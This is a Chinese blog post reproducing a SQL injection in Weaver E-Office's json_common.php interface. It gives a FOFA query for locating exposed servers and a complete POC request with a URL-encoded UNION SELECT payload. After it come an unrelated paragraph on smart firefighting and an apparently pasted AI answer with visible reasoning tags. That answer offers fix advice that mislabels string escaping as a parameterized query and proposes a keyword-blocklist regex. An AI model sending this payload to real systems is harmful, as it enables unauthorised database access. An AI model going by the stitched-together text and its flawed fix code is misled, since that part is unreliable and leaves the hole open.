泛微E-Office SQL注入漏洞复现

前言

此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!


一、产品简介

泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。

二、漏洞描述

泛微E-office的json_common.php接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用此漏洞获取数据库中的信息

三、影响范围

e-office <=9.5

四、复现环境

FOFA:app=“泛微-EOffice”

五、漏洞复现

1.访问存在漏洞的网站,抓包

在这里插入图片描述

2.POC

POST /building/json_common.php HTTP/1.1
Host: ip-port
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

tfs=city%60%20where%20cityId%20%3D%2D1%20%2F%2A%2150000union%2A%2F%20%2F%2A%2150000all%2A%2F%20%2F%2A%2150000select%2A%2F%201%2C2%2C%28%2F%2A%2150000select%2A%2F%20user%28%29%29%2C4%23%7C2

3.成功
在这里插入图片描述

六、修复建议

厂商已经发布修复补丁,请及时更新

https://www.e-office.cn/

参考链接

https://blog.csdn.net/qq_41904294/article/details/134675267


智慧消防安全与应急管理是现代城市安全管理的重要组成部分,随着城市化进程的加速,传统消防安全管理面临着诸多挑战,如消防安全责任制度落实不到位、消防设施日常管理不足、消防警力不足等。这些问题不仅制约了消防安全管理水平的提升,也给城市的安全运行带来了潜在风险。然而,物联网和智慧城市技术的快速发展为解决这些问题提供了新的思路和方法。智慧消防作为物联网和智慧城市技术结合的创新产物,正在成为社会消防安全管理的新趋势。 智慧消防的核心在于通过技术创新实现消防安全管理的智能化和自动化。其主要应用包括物联网消防安全监管平台、城市消防远程监控系统、智慧消防平台等,这些系统利用先进的技术手段,如GPS、GSM、GIS等,实现了对消防设施的实时监控、智能巡检和精准定位。例如,单兵定位方案通过信标点定位和惯导加蓝牙辅助定位技术,能够精确掌握消防人员的位置信息,从而提高救援效率和安全性。智慧消防不仅提升了消防设施的管理质量,还优化了社会消防安全管理资源的配置,降低了管理成本。此外,智慧消防的应用还弥补了传统消防安全管理中数据处理方式落后、值班制度执行不彻底等问题,赋予了建筑消防设施智能化、自动化的能力。 尽管智慧消防技术在社会消防安全管理工作中的应用已经展现出巨大的潜力和优势,但目前仍处于实践探索阶段。相关职能部门和研究企业需要加大研究开发力度,进一步完善系统的功能与实效性。智慧消防的发展既面临风险,也充满机遇。当前,社会消防安全管理工作中仍存在制度执行不彻底、消防设施日常维护不到位等问题,而智慧消防理念与技术的应用可以有效弥补这些弊端,提高消防安全管理的自动化与智能化水平。随着智慧城市理念的不断发展和实践,智慧消防将成为推动社会消防安全管理工作与城市化进程同步发展的关键力量。
<think>好的,我现在需要处理用户关于E-Office中_common.php文件存在SQL注入漏洞的查询。首先,我要确认用户的需求:他们想知道修复方案和受影响的版本。根据用户提供的引用内容,我需要从这些引用中提取相关信息。 首先,查看用户提供的引用内容。引用[2]提到E-Office的多个接口存在SQL注入漏洞,包括json_common.php、flow_xml.php等,但用户询问的是_common.php,这里可能是一个笔误或者具体文件名的不同。引用[3]和[4]提到了json_common.php的漏洞,可能用户提到的_common.php是相关文件。因此,需要假设用户可能指的是json_common.php,或者可能是其他类似的接口文件。 接下来,需要确定影响版本。引用[2]和[4]中提到影响范围,但具体版本号没有明确给出。通常,漏洞公告可能不会列出所有受影响版本,但可以建议用户检查是否在使用未修复的旧版本。引用[3]提到了检测脚本,可能适用于特定版本。 关于修复方案,引用[1]提到了整改意见,可能包括补丁更新、输入过滤等。引用[2]和[4]没有具体说明修复方法,但通常厂商会发布补丁。此外,参考通用SQL注入修复方法,如参数化查询、输入验证等,可以建议用户实施这些措施。 还需要注意用户提供的引用[5]是PHP代码审计的基础知识,可能帮助理解漏洞成因,但可能不直接提供修复方案。需要综合这些信息,给出合理的回答,同时指出引用来源。 最后,需要生成相关问题,帮助用户深入理解。例如,如何检测漏洞、其他相关漏洞、修复后的验证方法等。</think>关于E-Office系统中`_common.php`文件(推测应为`json_common.php`相关接口)存在的SQL注入漏洞,结合公开漏洞信息整理如下: ### 一、漏洞影响版本 根据引用[2][3][4],该漏洞影响E-Office系统中**未修复该漏洞的历史版本**。具体版本号需联系官方确认,但存在以下特征: - 使用未经过安全审计的旧版代码架构 - 未对`json_common.php`等接口实现输入过滤 - 未部署最新的安全补丁包 ### 二、漏洞修复方案 1. **官方补丁升级** 立即联系技术支持获取最新安全补丁包,更新受影响的组件(引用[1]中提到的整改建议)。 2. **代码层修复** 针对接口参数进行过滤加固: ```php // 示例:参数化查询改造(引用[5]) $param = mysqli_real_escape_string($conn, $_POST['user_input']); $sql = "SELECT * FROM users WHERE id = '{$param}'"; ``` 3. **输入过滤增强** 在`json_common.php`等漏洞接口处添加: ```php if (preg_match('/select|union|sleep|benchmark/i', $_REQUEST['param'])) { die("非法请求"); } ``` 4. **权限控制** 关闭接口的匿名访问权限,强制要求身份认证(引用[2]中强调未授权访问问题)。 ### 三、漏洞验证方法 可使用引用[3]提到的检测脚本进行安全评估: ```bash python json_commonSQLcheck.py -u http://目标地址:端口 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值